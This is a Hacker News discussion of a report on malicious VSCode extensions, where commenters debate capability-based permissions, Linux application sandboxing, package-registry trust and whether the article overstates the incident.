Hacker News new | past | comments | ask | show | jobs | submit login
Malicious VSCode extensions with more than 45k installs (checkpoint.com)
317 points by chha on May 22, 2023 | hide | past | favorite | 186 comments



Capabilities-based security prevents these supply chain attacks! (Even though in this case most of the downloads were of packages including unwanted telemetry and not something more dangerous.)

“…And now if a [color theme] wants to read your data and send it to a server, it needs a filesystem capability and a network capability. It should be an obvious red flag if a [theming addon] were to ask for those dependencies. And this makes it hard to hide malware.” https://borretti.me/article/how-capabilities-work-austral

The original quote talks about a leftpad dependency but it’s a drop-in substitution to apply it here, too. It’s right there in the screenshot:

    const https = require(‘http’)
    const os = require(‘os’)
Both of those calls ought to error out with “Error: Network capability not provided” and “Error: filesystem capability not provided”, respectively.


Yes! Sadly, today nobody seem to care about the principle of least privileges. Take Linux as an example: every program you install gets full access to the system, and gets thousands of privileges it doesn't need. If your PDF reader is vulnerable, it will have both access to your SSH keys and to the Internet to upload them (and if you block Internet access for a PDF reader, it still can send the data by connecting to systemd DNS resolver via DBUS and exporting your keys as DNS requests).

Security is a joke in Linux in default configuration.

> . It should be an obvious red flag if a [theming addon] were to ask for those dependencies

No. Theming addons should not even be able to ask for those privileges.


> No. Theming addons should not even be able to ask for those privileges.

That's not the principle of least privilege, that's a user rule, and it isn't necessarily a good one.

I can imagine, for example, a theming add-on which queries a weather API and picks colors based on that, perhaps displaying a nice weather bar in the status line.

Such a theme would need to be granted this privilege, which should ideally be restricted to a hosts list, such that the user could pick another weather endpoint, but the theme can't promise weather and give weather and Google Analytics or your choice of telemetry endpoint.


Agree, although what would be really useful is if the capability listed exactly what data will be queried from VSCode and sent to the remote endpoint.


Something like a declared list of DNS domains the extension wants to access?


> Take Linux as an example: every program you install gets full access to the system...

... which should be locked down by group assignments and file-system permission flags. What the hell am I missing? The POSIX model has worked extraordinarily well for decades. The issue you're describing would be no different in Windows or any other operating system. If you install a malicious program, it can embed whatever protocols and communication channels it needs to exfiltrate any data your user account has access to. It's great to advocate for absolute least privilege in programs, but the only people who want to manage a matrix of permissions for every application the system would be IT managers who don't have to deal with the hassle or the complaints. This is precisely why so many things slip through on mobile. "Ain't nobody got time for that."


Do you execute your SSH agent as a different user/group from the one you use for your PDF reader? Does Firefox only get to read and write to ~/.config, ~/.cache and ~/Downloads?

The capabilities are there for the people who want to hot glue some elaborate contraptions together, but there is no good UX or DX for doing this in a composable manner for end user consumption.


The tools are there, if you care to use them.

A combination of very restrictive globals.local and <appname>.local files added to Firejail + custom apparmor rules allows me to jail applications as well or likely better than is possible on any other platform. Other tools are available that accomplish the same, if either or both of these is not to your liking (firejail has improved greatly with recent versions, if your opinion was formed years ago, but not all default profiles have migrated to restrictive explicit allow policies vs. permissive explicit deny policies yet, and those old policies are a pita to add your own restrictions to).

You could also just live with the default rule sets Firejail and Apparmor ship with, and have less restrictively jailed apps by default, but in many cases sufficiently jailed to prevent access to e.g., your ssh-agent without any additional effort-- in this case jailing is just install firejail+apparmor and create a few symlinks for the applications you want to be jailed (IMO still not a high effort bar; and, there is a single command that will create symlinks for you, for everything firejail ships a default profile for, if you feel comfortable running that).

Nothing that interacts with the Internet or untrusted files has access to anything confidential in my home dir, or anywhere else on my system unless that access is needed (including the named pipe for ssh-agent). None of these applications have network access that don't need it. Apps can only use syscalls that are explicitly listed, cannot gain capabilities beyond the restricted capabilities listed, only have access to the bins necessary to run, can only see existence of processes in their own jail, etc.

If, privileged filesystem or network access isn't required as the rule, I'll add a separate profile with extra privileges, and the default profile will not have that access. E.g., for pdf files, I have 'atril' and 'atril-privileged'. Neither atril profile has network access, nor access to ssh keys, global ~/.cache, etc. The day to day one can only read from a few locations on the filesystem, and can only write to two paths. The privileged one can also read where I save private info like tax information.

Firefox profiles run entirely in tmpfs, with each profile having its own ~/.cache ~/Downloads (the real ~/Downloads contains symlinks to each of the jailed Download dirs), etc. I setup the tmpfs for firefox and chromium with a wrapper script, so I can easily handle data that I want to persist and to work around limitations in Firejail. There are separate launchers (rarely used) for Firefox/chromium which allow persistently modifying the profiles (most firefox config is via user.js and misc sqlite/json files, but I'm unaware of an equivalent for chromium).

DBUS is a pita for jails, though. To prevent escaping your private mount namespace jail, you really have to kill dbus access inside the jail (which requires a private net namespace or disallowing unix domain sockets to be really sure; but sometimes all you can do is add a filter-- Firejail allows for all of these options [with limitations on net namespace support for unpriv users] ).

Another addition to my setup that made it so the above restrictions were more or less transparent is a script that runs as a daemon outside the jails and gets fed filenames and urls from another script that runs inside each jail that is symlinked as e.g., symlink name 'atril' for launching a pdf viewer from within a jail-- the outer daemon script will launch an new jail instance of atril with the file passed from e.g., the thunderbird jail by the helper script inside that jail. For URLs, the same jail instance of firefox is re-used.


Indeed, SELinux and AppArmor are the tools here. I had a lot of trouble with them when they first came out, and just left them out of the loop. I had forgotten them since moving to Mac's about 8 years ago.


I used SELinux and AppArmor at work, and AppArmor for my own stuff. I found SELinux to be pretty unpleasant, but AppArmor rulesets / overrides not so bad. Definitely agree that there is a lot of room for improvement[1], but the tools exist, and if a person cares enough, can jail apps at least as securely as on any other platform.

[1] Other warts are not having syscall groups like openBSD pledge, so you have to track down new syscalls in each new kernel version to restrict using deny policies (which are more flexible than using explicit allow policies). And, linux capabilities are a mess that really deserves a do-over. You can get root with any of, at least, 6 capabilities. And, so much stuff is crammed into CAP_SYS_ADMIN and CAP_NET_ADMIN, that you effectively lose any granularity in selectively allowing privileged activities.


Cool, where can regular users get a setup like this that just works?


Nowhere?

You can get weaker jails, that are more likely to get in your way, on Linux and other platforms that "just work-ish" though [1].

Default jails on Linux with Firejail really is just install the application and run a single command, to jail everything it knows about. Or just create symlinks manually to be more selective. Not a high bar.

Having the ability to customize means not having to change the way I do things to conform to the whims of some random company. Jails that "just work", but do not allow customization are jailing the user too.

[1] You will need to adjust the way you work to the way the jails are setup by default. Some things you may want to do will not work at all, or not in the way you want them to. Many things will not be as extensively jailed as you might like. Applies to any of, Android, iOS, Firejail, etc., using defaults.


> Do you execute your SSH agent as a different user/group from the one you use for your PDF reader?

Yes, if it's executed from a script.

> Does Firefox only get to read and write to ~/.config, ~/.cache and ~/Downloads?

I hear people don't like snaps. https://snapcraft.io/docs/home-interface


The MacOS app store has some sandboxing. For example, applications installed from the store can't access any file or directory unless a user has selected it in a file dialog. (The app can hold onto a ticket for later access.) I've installed Slack from the app store for this reason.


I've installed Slack on macOS using Nix. That way, the installer's sha256 is checked, and its attempts at self-modification (updating) are thwarted by /nix/store being a read-only filesystem.


I think MacOS has some protection even for manually installed apps. I downloaded iTerm2 as a .pkg and installed it manually into Applications, but the first time I typed `cd Downloads` I got an OS-level popup asking if I wanted to grant iTerm2 access to my downloads folder.


Linux has a fundamental security problem - it basically tries to protect the system from the user, not the user from himself (other user apps).

So it's difficult to modify a Linux system binary, but it's extremely easy to delete or exfiltrate a user file.

This security model might have made sense in the past, but today it's totally outdated since almost all systems, both local and in the cloud, have a single user which is the owner (has sudo).


Users were important in the past as well :)


> every program you install gets full access to the system

It gets your user's privileges when you run it. It's up to you how you run your programs.

Also there's no "default Linux configuration". There are many distributions, and they have different defaults and approaches.


Many distros with many approaches, yet not a single one with a convenient security feature that comment is mentioning

So it's not "up to me" if the good choice is not practical


Yeah, it's too hard to just `useradd -m name` a new user, maybe set default acl once via setfacl -m d:u:main-user:rwx /home/name for easier file sharing with the main desktop user account, and `sudo su - name` to it, and run whatever less trusted apps need to run under that user account from then on, mostly isolated from the rest of the [file]system.

Distros clearly don't allow this and none has this feature or these commands preinstalled by default, nor they are built to be multi-user OSes. :D


Fedora (and I think all the RHEL family) comes with SE Linux by default. Although I'm not that familiar with it (I tend to disable it more often than not) it seems to me like it's addressing precisely that.


It can't address that when it's disabled, and since it's not a good tool of addressing the issue, it stays disabled


selinux isn't used in any meaningful way for desktop software.

The actual solution in that space is Flatpak.


my user's privileges contain my ssh keys, my passwords database, my personal files, ...


But that's your choice. I have multiple "users", and only one of them has access to ssh keys, etc. Users I use for less trusted apps just have write access to their mostly empty home dir filled with some dotfiles "whatever" app created by itself.

You can firewall by process UIDs/GIDs too, and I use that to allow the user access only to the internet and not to localhost or home network, or only to localhost, etc.


> Sadly, today nobody seem to care about the principle of least privileges.

People care.

But not enough to go through AppArmor/SELinux hell.

It's a lot of work.


At least there is practiced, hardened and battle-tested tools that are relatively straight-forward to use in Linux-land, like AppArmor.

MacOS also recently started investing more into securing the desktops of developers.

Windows seems shit out of luck in that regards.


I'm not sure whether it does what you want, but Windows has "Windows Sandbox":

https://learn.microsoft.com/en-us/windows/security/threat-pr...


Question: do snaps or similar tech in the distros help with this?


Yes Snap and Flatpak directly help solve this problem.


>is a joke

What did you expect? This is a computer to access and manipulate data, not to consume it as a smartphone.

Call me when a smartphone locked toyware can do 1% of what Emacs can do.

If any, stop using propietary crap to do your daily job.


If I am the one who decides what is locked (and not Google or Apple) then "smartphone" security model is good for me.


I want that feature too, but in reality, many non-trivial extensions require the execution of binaries such as language servers. Applying capability models to these executables will require OS support or containerization, but the overhead for memory and disk will be huge. In fact, even an extension to auto-complete paths in .gitignore files requires running a language server written in Rust [1], and it has the real benefit of supporting multiple editors with ease. If the "prettiest java" or "python-vscode" extensions in the article insisted on needing full permissions for Java or Python execution, I believe users would be convinced and end up installing them.

[1] https://github.com/quentinguidee/gitignore-ultimate-vscode


A language server for gitignore is not what I was expecting to come across this morning.

https://github.com/quentinguidee/gitignore-ultimate-server


> Applying capability models to these executables will require OS support or containerization, but the overhead for memory and disk will be huge.

This is because most OSes use outdated security model where the app gets all privileges by default and poor users have to build containers to revoke them, that's why there is an overhead.

If the extension only has access to project files then all applications launched by it should inherit its restrictions.


This… is a very strong objection and I think you’re right that users would be convinced. I didn’t think capabilities would be a panacea but I did think they would be pretty close, I have to revise that down somewhat.


Couldn't you just run the language server in webassembly?


Yeah, android tried this initially with the permissions system. But literally every app requested every permission and it became completely useless.

As a user, you have no way of meaningfully using this info.


> android tried this initially with the permissions system. But literally every app requested every permission and it became completely useless.

Google could have fixed this by allowing the user to give the app mock permissions instead, e.g. empty or randomly-generated storage, fake camera device, randomly-generated contact list, etc. Third-party solutions that allow this have been around for about a decade, but they do not have the reach that Google does.


A counter-example where a permissions system mostly still works is Mac apps. They also have to request permissions for things like using the webcam, accessing important areas of the filesystem, reading keyboard input when they’re not the active program, and so on.

It might be illustrative that Apple, who usually care a lot about good UX, made this procedure downright painful. When the app is installed it’s fine, but when it tries to use a permissioned resource for the first time that pops up a dialog box. That box is not confirm/deny, but rather sends you to the System Settings window, where you have to find the right category, find the program in that category, select Allow, and then enter your password. It seems like Apple might think the Android permissions system failed in part because they made it too easy to say yes.


I'd say VSCode is a bit different in who it's aimed at. Only because it doesn't work for a consumer product doesn't mean this wouldn't work for VSCode.

Also it might be good to be more specific. E.g. don't ask for all permissions at once, instead if the app starts talking to telemetry.endpoint.com it has to ask for these specific permissions at that point.

Then the user can see, hey this is requesting access to this particular server, that seems fishy, let's not proceed.


Are VSCode users really that much more diligent? Are you auditing the source code for every extension you install? Do you even know if the github source is the same as whats hosted on the plugins repo?

The only real solution I can see is only installing plugins from large trusted entities.


For sketch extensions, download the vsix from the marketplace and extract it (it’s just a zip), then inspect that and load it.


> But literally every app requested every permission

They didn't. Google regrouped and renamed the permissions until every normal thing that every application needed became grouped with rare and powerful capabilities.

Except for the ad-based crapware, almost all applications minimize their permissions.


Users here are experienced developers, so I think it's not such a big deal. In context, a theme should never need network or file storage access, so you could upfront block those for that type of extension. You can also have policies like "network access is okay but file system and network access together needs approval".


Why are you assuming most VSCode users are "experienced developers"? I would think quite the contrary, as the younger crowd is probably much more likely to be using it than more experienced developers.


Fair enough. I think we can agree that the average VS code developer is more technically savvy than the average Android user?


I find I very quickly tire of having to think about this. You think "A theme shouldn't require file storage access" and then spend an hour looking up why it does and find out there is actually some strange but totally legitimate reason for it. And every time that happens, you lose a little bit of will to care about what permissions something requested.

There used to be a period where many android apps would explain in the description why they needed certain permissions. Those days are over.


> You think "A theme shouldn't require file storage access" and then spend an hour looking up why it does and find out there is actually some strange but totally legitimate reason for it

No. You think it is suspicious and install another theme that doesn't request anything.


I regularly deny various permissions to various Android apps (camera permission, file access, ...) and they degrade gracefully and keep on working.


Android used to ask for all permissions upfront, you have no choice. You want the app? Too bad, it is gets access to your contacts. Now apps have to ask when they need them and they are working on making file permissions more granular as well


If there was a permission dialog with boxes I would gladly check or uncheck them because nowadays I need to write bash scripts, create separate users or build containers for every third-party app. Why doesn't OS include necessary tools?


Capabilities can improve the situation significantly but we need to change how we build software too e.g. ".env" files in the project space will still be vulnerable due to the confused deputy problem.


Packj [1] flags malicious/risky NPM/PyPI/RubyGems packages by carrying out static analysis and looking for capabilities/permissions (diff from runtime permission enforcement). Supporting VSCode/browser extensions is on our roadmap.

Disclaimer: I'm the lead developer.

1. https://github.com/ossillate-inc/packj


In the context of an editor, this can be bypassed by writing this kind of code to the project, which will be run when the developer runs the project, runs tests, or in some languages even when the project is compiled.

A theme probably doesn't need access to the project files, but many extensions do. This is much harder to solve than in e.g. Android.



No, the fundamental uselessness of Deno is that it only supports process based permissions (a fact I initially debated with them over 4 years ago now…). For performance reasons all extensions run in the same process, so that wouldn’t work here.


Actually malicious extension only had 250 downloads, 45k installs extension was sending telemetry only. It’s a very misleading title collapsing two separate incidents into one for the sake of dramatization.

This article also highlighted that automated tools used by VS team are pretty good at catching most of similar issues.


Tracking your host name is not telemetry, it's definitely spyware.


Exactly. Typically, exfiltrating this kind of information is only the first step. Once enough high value targets are caught in this net, the actual malware is deployed.


Still, it's not nearly on the same level as exfiltrating secrets.


Article disingenuously wraps a couple extensions that seem to be “actually” malicious (secret stealing), with one that has a lot of installs and is “HN-malicious” (collects telemetry) for a striking headline.

That said, malicious code in VS Code extensions is a problem. I wonder if a GPT could be helpful here. The existing internal systems for detecting malicious code seem lacking.


"HN-malicious"

Hehe. We could probably come up with a dozen similar HN specific adjectives.


HN-incompatible: Any website that hijacks the scroll bar or the back button of the browser..


"HN-stupid"

Anything known to be wrong with 20/20 hindsight.


Lol. MS Notepad is HN-bloated.


I would argue that Notepad was one of the few apps that wasn't HN-bloated. Although, I kind of think I head that they rewrote it, so it probably is now...


This is one of the reasons I am *very* hesitant with VS Code extensions and Jetbrains plugins. The absolute minimum is strictly enforced on all my machines. Ditto for project dependencies (NPM, PyPi, Gradle etc.)

However, the way things are going, news of these vulnerabilities / incidents will be used to push through the Codespaces (IDE on the cloud) among enterprises -- and many companies will fall for it.

I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe. :-/


I think if it's a large org you should treat engineer machines as threat vectors by default, PoLP and all that jazz.

Someone already posted here how they were able to use PIP to hijack Google developer machines because on their machines defaults were to resolve to public repo first (even for private packages). Google just closed/ignored the issue because this was engineers problem and official build was setup to resolve correctly (this is my from memory summary)


If you apply principle of least privilege to developers then ideally you should have a whitelist of every software package that they need to use. What happens then when a productive developer, instead of developing from scratch, searches for a solution to some problem and discovers that there is already a module that may solve it? Do they go to some central committe to get approval to add it to the whitelist? What are their criteria? How long will it take them to approve it?

Suppose it takes a couple of days. Then the developer tries the module. Discovers immediately that the module doesn't solve the problem. That's two days wasted for nothing.

Suppose some module that has dependencies on a huge list of other modules. How long will it take now?

I'm not saying polp isn't valid. But is it practical?


> Do they go to some central committe to get approval to add it to the whitelist? What are their criteria? How long will it take them to approve it?

Yes, depends on the org, depends on the org.

Introducing third party dependencies should not be a single person decision.


Oh, yeah. That's how I have to treat large orgs as a contractor. :) And trouble start almost immediately, because they apply PoLP only to you...

First thing with a new client is usually some form of a VPN access. Even with open protocols, it's challenging to secure a VPN access. Eg. by default running openvpn with a random config provided by a third party allows the third party to push any network setup they want remotely. There's no whitelist, etc. It takes quite a bit of effort to run openvpn as unprivileged user and make it do all network setup via a trusted setuid helper tool that can do whitelisting of allowed network configurations.

And oftentimes VPN has to be some closed source garbage. Management daemons for these require high privileges and take remote commands on how to reconfigure the network and god knows what else. They also can't deal with any non-basic networking setup. The first such VPN solution I had to briefly deal with (before telling the client that we'll want something secure for both sides and it's going to be a fixed wireguard config), was some Linux binary blob that I checked in ghidra before running, and one of the first things it did was scan the system for USB devices, and it had other hidden (to the end user, probably not to the buyer) remote management functionality absolutely irrelevant to a VPN software.

Devs need to apply PoLP also to the clients. Otherwise it's quite easy to accidentally route networks of multiple different clients together via a dev's machine.


I use a VM for each client. I host it on my desktop and then when I need to work from a laptop I just SSH into the VM.

This way I never "forget to turn off the client VPN" and similar BS, and my client files don't get mixed up, etc.


That works for a client or two. I'm already at ~20 and there will eventually be hundreds. Managing all that via random VMs and VPN solutions (I've had some require some smartphone app, and one time codes + pins just to connect to VPN) would just be sheer craziness if everyone was allowed their own VPN solution and network setup.


>I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe. :-/

When SEs could be trusted?

We run so much 3rd party code that it would be insane to expect SEs to verify it.

Security industry is also heavy of bullshit

Instead of performing reviews they run some "scanners" and fill checkboxes


My God, the list of npm dependencies some projects I've worked on had.

Endless.

Anyway, it could have been me. I don't inspect vim plugins before install, generally.

Security is hard. Even if you're an expert, it's a lot of work.


As a bare minimum security measure, when using plugins (all 9 of them), my Vim runs in a bubblewrap sandbox with only my project folder mounted as writable. Network and IPC access is completely disabled. It is secure enough to stop practically all non-targeted attacks.

Generally I try to install plugins whose authors I know. And whenever I update them (once a year) I re-read the entire source code. Some small plugins I just integrate in vimrc directly.

I hate to say this but Vim isn't the most secure editor, considering features like modelines which some environments enable by default and an aggressive plugin installing culture.


So it's Emacs, but we want features and not to be locked. Don't run propietary crap, trust Elisp repo like ELPA and NonGNU and you will be mostly safe.


Isn't MELPA just serving the latest git master of whatever it happens to be at the time package-refresh-contents was called? With MELPA stable likewise just serving the latest tag? That doesn't spell trust.


Using Emacs is not going to help you to avoid supply chain attacks per se. What it might do, however, is give you unparalleled power to inspect your environment - calls and source. If you run untrusted code you are exposed, and thats that. Development tools should assume that you, a programmer, know what you are programming.

Emacs and lisp is focused on providing power, not security. These often do not go hand in hand.


> What it might do, however, is give you unparalleled power to inspect your environment [...]

The "read the source" argument. It doesn't scale. I don't have 17 lifetimes to study a single release of every bit of software I run.

I really do appreciate Emacs for the introspection capabilities, but it's not a solution to the trust chain issue.


It scales to "don't run untrusted code if you are concerned about security"


> don't run untrusted code

The entire point of this thread is how a chain of trust should be maintained. "Don't run untrusted code" is skipping from the question straight to a hypothetical world where an answer has already been established.

"How to live long" - "don't die".


MELPA is not ELPA.


I always give source code a glance, unless it's by a sufficiently prominent and reputable maintainer.


Do you check _their_ dependencies though? And do you check every file?


I don't check every file but I use very sophisticated proprietary heuristics such as "intuition" and "hunch" for how far to dig.

I use vim so dependencies are explicit. But when using npm packages in work I give dependencies a look before I look anywhere else. An unfamiliar dependency gets looked at. It's easier since npm web browser allows inspecting code.

It's a very imperfect process.


Have you ever caught anything?


No, that would be a different story:) ended up not using dozens of plugins and libs stuff after a look at their dependencies and code though


Emacs has deps on libraries such as pdf-tools with mupdf and telega with tdlib, but these are installed from the OS repos so they are trustful.


Only handful of Vim plugins have dependencies and even then you need to install them explicitly


> I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe.

Were they ever? It's a big set of folks, and while some of them were and are competent an even larger subset isn't.


Too add salt to the wound often their machines have more rights/access too, making the impact that much more.


There must be a huge market for "audited and validated" subsets of the major package managers. For a monthly fee you have access to a secure version where all dependancies are checked (manually, or automatically) for vulnerabilities and where no new packages, or versions, can be added without having eyes over by a human.

Throw in a credits or fees system where you can request, for a cost, a none audited package is added to the subset but then it's available for everyone.


Sure, but the business model for the entity providing that sucks. Practically infinite amounts of possible exploits and extremely finite resources to detect them. Either that or you are back to where you started with a web of trust.


I agree that would be a tough business model. Even for a relatively small package set like VS Code plugins there must be many thousands of releases to check every year and the potential market of paying customers for the tool is limited. Maybe it could work if some of the tech giants sponsored it?

For the wider problem of depending on external packages and managers like pip or npm I don't see how anyone could realistically keep up with the scale of releases that would need to be checked. You would need far fewer packages from far fewer sources with far less frequent releases for this to be a viable strategy. That might be nicer for developers for other reasons as well but it's not the world we live in today.


> Maybe it could work if some of the tech giants sponsored it

its not about them sponsoring it, that frames it wrong. They news to use it, they have security budgets in the tens of millions, they will already be doing some auditing of their own. A vendor can provide that service to the wider market.


I could be a "risk assesment" service. For a given package it could run an automated web-of-trust on it together with an analysis of past history of vulnerabilities and of its mantainers.

You can also add watchers to check who is allowed to publish new versions ad see when that list changes.

Even without looking at the code you could gather a useful report.


All it takes is one tired/careless/unlucky dev or it engineer to get their machine owned, at minimum resulting in an extensive and tiring incident response and forensic verification to confirm nothing else happened, bearing in mind once the attackers get a foothold they'll try to blend in.


> I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe. :-/

I think we never could in the first place? While we are more cautious than the average user, we might occasionally shoot ourself in the foot. That’s part of our job.

The extensions shown in this example would not have ended up on my machine, simply because of the red flags they come with.


Are we more cautious? We might not fall for the old scam of extension bars in the browser and approving spam notifications but I'm sure plenty of people would blindly follow a tutorial to run commands in the terminal and install dependencies to run code.

The most recent example was probably Win 11 replacing the status bar and people recommending all kinds of anonymous software on GitHub. It's open source and works so it must be alright.


Plenty of popular developer-friendly tools have installation instructions that involve sudo, curl and piping to sh. That says everything we need to know. But if it didn't then the way many developers will casually install packages from untrusted third parties when the installation scripts themselves could do almost anything says the rest.

In addition developer PCs often have more privileges than a typical office worker. That's legitimately useful for our work but also means compromising a developer machine is a bigger risk. We're a nightmare for any organisation that wants proper IT security.


This feature request has been sitting around since 2018:

https://github.com/microsoft/vscode/issues/52116

It advocates for treating VSCode extension permissioning like browser extension permissioning.

Of course, it's not a panacea, but it would be lovely to have.

I discovered it when I went searching for a way to disable network access for a particular extension. You can do it, sort of, for VSCode itself, but not for individual extensions.


2 out of the 3 examples do not have more than 45k installs. The one example that did "had a simple PII stealer code" but was actually just sending telemetry.

The point of the article is probably valid, but the article itself seems to be dishonest.


I noticed that too, right from the headline "Malicious Extensions with more than 45,000 Installs" with a screenshot showing "278 installs".

Exaggerate much?


Does the 45k installs mean for a specific extension or just that 45k installs in total of all extensions?


One of the extensions had 45213 installs, which is what the headline stated. But no matter how you count it, the rest of the extensions was far off 45k.


I read it as any extension with more than 45k installs.

If it's 45k total, that's a very small percentage of all installs.


Right, but the one with 45k installs wasn't malicious - sending os version telemetry isn't PII stealing


I work in this space and see these types of "hit articles" so often.

These "security researchers/products" aren't doing anything more than spreading FUD and trying to sell their own products. Most of the FUD they spread is so widely misunderstood and positioned as if X thousands of machines/developers were "affected". The reality is much different.

In the name of being a good security citizen, please just report these extensions so action can be taken and less copy cats occur. Stop writing about these non-events. The reality of each registry is that there will always be bad extensions/packages/etc. The stewards of each registry work very hard to keep them safe. These types of articles make their lives harder, not easier.


> The stewards of each registry work very hard to keep them safe.

What kinds of things do they do? Any idea how this slipped through? Do you know what the review process entails before a plugin is made available for download?


Many things...

They verify that submissions meet criteria.

They scan for known malicious code/vulnerabilities.

They work with security researchers to take appropriate action on reports.

They enforce CoC and ToS policy to any that abuse it.

They work with the community to address any unrest.

They continuously monitor for suspicious activity.

They respond to active security incidents.

They work across many security working groups to stay current on best practices, latest standards, newest initiatives.

As to your other questions, this isn't "slipping through". These registries act under a "trust but verify" model. It simply would not scale if they had to manually review all submissions akin to the app store(Zero trust). Most of these registries run on volunteers or small pizza teams.

Every single registry has similar challenges. PyPi just last weekend had to halt user sign-ups and uploads due to these abuses.


I'll take the opportunity to self plug: I've been working on a solution to help bridge this gap of having to blindly trust VSCode extensions, planning to eventually also release it as open source

You're welcome to sign up for early access at https://coderguard.io/

As I'm currently mainly looking for user feedback


Looks interesting, I used to work on the vscode team, lmk if there’s anything I might help with.


As I understand, VSCode extensions can run arbitrary shell commands and Microsoft didn't add any security measures (e.g. asking a user for confirmation). In this case it is only a matter of time, motivation and perseverance until all users who use extensions will get a back door.

Of course this applies not only to VS Code, but to any other software which allows to install third-party extensions like browsers, Gimp, Inkscape, DAWs like Ableton Live, etc. Their developers do not care about security and do not take measures to protect against malicious extensions.


Why should we? Repos like ELPA, NonGNU and CPAN are trusted enough.


Indeed. Professional woodworking equipment can also cut you, but that’s a risk we accept as we know their developers also care more about providing a tool that works and can be used responsibly by trained professionals. Yes we could insist everyone only hands us straight jackets in padded rooms, but I’m not sure that’d be a good thing.


For over 20 years now, professional woodworkers have had SawStops, devices that literally use an explosive charge to ram a block of aluminum into the blade of a table saw when it detects that the blade is touching something that might be a human body part. These are $50+ devices that destroy themselves on use (and often destroy the $50+ blade they’re used on), they have a high false positive rate, and yet they’re still in heavy use and very popular with professional woodworkers. Table saws also have riving knives and sleds with clamps, both to prevent kickback. All of this on top of constantly educating woodworkers to be responsible and use push blocks instead of their hands, to boot. All of these safety features exist on table saws because we did educate woodworkers on how to be responsible, and we still saw that the average table saw will cause more than one injury in its lifetime. I’m actually really glad you brought up woodworking because table saws are a perfect example of how we saw “this is risky, be responsible” was inadequate.


I remember as a kid seeing the Tomorrow's World episode where the chap demonstrated it to probably Philippa Forrester and Peter Snow. It looked like magic. What a great idea.


Not something you’ll find in any professional cabinetry shop. But you’re welcome to use Notepad for all your coding.


But if saw stops are mandatory, how the heck am I supposed to cut hotdogs?


little snitch is the sawstop.

detecting and preventing exfil attempts in real time is the current sota.


There's some capabilities-based security talk going on here, but the current state of the art in JavaScript makes absolutely no sense to me. It's nonsensical on its face. Right now, you grant caps through Deno to the whole executable script--so dependencies left and right that don't need caps get them.

So, what's the point? It's literally worthless. It does nothing to stop capabilities abuse.

The same thing could have happened here with Visual Studio Code. The language nor its popular runtimes are simply not designed for this behavior.

As far as I know Node.js still doesn't have capabilities functionality, which doesn't matter, because how broken Deno's is means they're practically on the same footing.


The “right answer” afaik is to adopt the web permission model, which VSCode actually already supports. In addition to the Node extension host, there’s a WebWorker extension host which is much more secure (it’s the only host available on things like vscode.dev). Extensions need to opt into it unfortunately, but the code changes are not too bad in my experience.


I agree, but it's not a problem unique to javascript. I'm not aware of any popular language/runtime/package manager that goes beyond what Deno can do, however insufficient that is. It's quite a hard problem.


It’s a problem with security across computing in general, not just JS. For example, what are these languages and runtimes you have in mind that solve this issue with app plugins if VS Code were using them instead?


In other languages, it's possible to set environments where code run from that environment have restricted access to explicitly defined globals.

You can do this to create things like plugin systems, etc, where you know by specification you never want a context to have access to say, making HTTP requests.


Out of curiosity, which languages?


Lua comes to mind first, with `setenv`, other languages have similar functionality. I believe this can be done with C#, too.


I wonder how this would look elsewhere as things like WASM for extensions becomes more popular. How would you model capabilities in Rust? How would that not apply to the whole results binary?


If Dracula Dark's telemetry is malicious, VSCode itself also malicious XDDDDD


> These continued findings highlight the need to verify every open-source component, not just assume it will be ok. We have included details regarding our specific findings below.

So, how they suggest we do this with extensions for Visual Studio Code? The editor, as far as I know, doesn't contain any utilities for inspecting the actual source code of the installed plugin before installing, and instead you would have to use some 3rd party thing for downloading the zip file, then manually inspect the contents, before manually installing from the zip archive.

With a subtitle of "Securing the cloud", it's hard to see how they are securing anything here, besides removing three extensions that may or may not be malicious. They're not actually providing any solution, even though they end with plugging their CloudGuard Spectral product that wouldn't even help in this particular case...


> This fact highlights again the open-source components risk; no one guarantees that the open sources we use are benign, and it’s our responsibility to verify them.

It's odd to call this "the open-source components risk" when the exact same things are true for closed-source...


Three welcome dialogs at once, enable notifications, cookies and bot wanting to chat plus the crappy low resolution logo were enough for me to not even start reading. Judging by the comments here I didn't miss anything important.


thats why we need wasi/wasm bashed sandboxed plugins scoped bashed on capability it needs.

i think lapce supports wasi plugin but overall ux is not there yet when i last tried.

https://github.com/lapce/lapce


Some people have argued that we should work inside expendable and tightly restricted VMs when doing anything that involves fetching packages from a repository using a package manager. I used to feel that was quite an extreme position but it does make sense because the risk we're discussing is really a consequence of two systemic vulnerabilities. Mainstream desktop operating systems have weak security models that aren't fit for purpose in our modern online-first world. And software development has evolved this strange philosophy that fetching someone else's code for every tiny thing is a good idea and code in someone else's repo is better than anything we could write ourselves. Those are both terrible ideas but neither is going to change quickly so maybe the sandbox advocates aren't so extreme after all?

Also did anyone else notice the timeline at the end of the article where it took 10 days to remove these packages from the repo? I could understand some hesitation if a package has something like debatable telemetry but surely behaviour like obfuscated code should result in an immediate block by default?


>Mainstream desktop operating systems have weak security models that aren't fit for purpose in our modern online-first world

Stop using propietary software first, then we will discuss your "security" rants. Perl users have been using CPAN since forever, so did LaTeX users with CTAN. Ditto with Emacs users with ELPA and NonGNU. No issues with addons.


This has little to do with being open or proprietary. CPAN is analogous to repositories we use with pip or npm today and most of what is involved is not proprietary on any of those platforms. The relevant differences are cultural and technical.

I don't think invoking CTAN as an example is very convincing. It's well known that there are only seven people in the universe who can actually program TeX and they probably have little interest in trying to infect each other with malware.


They only found these malwares because the malware part was at the top level. Who knows how many are there that hide this logic in an npm dependency.



Now what if there only was a way to detect apps doing suspicious network requests... /s


I have been leery of VSCode for this reason. The bare product isn’t very special, so you have to download extensions to get the functionality you need. However, there is nothing keeping the extension from communicating. Suddenly, you get malicious extensions that leak data.

It’s not just malicious extension authors. Compromised developers of good extensions are just as much, if not bigger, of a risk.


> I have been leery of VSCode for this reason.

> It’s not just malicious extension authors. Compromised developers of good extensions are just as much, if not bigger, of a risk.

If this is your reason to avoid VSCode, then you should probably start avoiding basically all other code, too. It is after all written by developers, who can and has been compromised. All over the supply chain. Over and over again. And so on.

But yea, hate on VSCode will you.


replace VSCode with any other code editor and it will still work.

Vim, Emacs, Sublime are all examples of bare products that aren't very special unless you add extensions that could potentially leak data and run arbitrary commands.

the fact that only a couple extensions have been found leaking some data involving only a few thousands installs, it's honestly a very good record if you ask me.


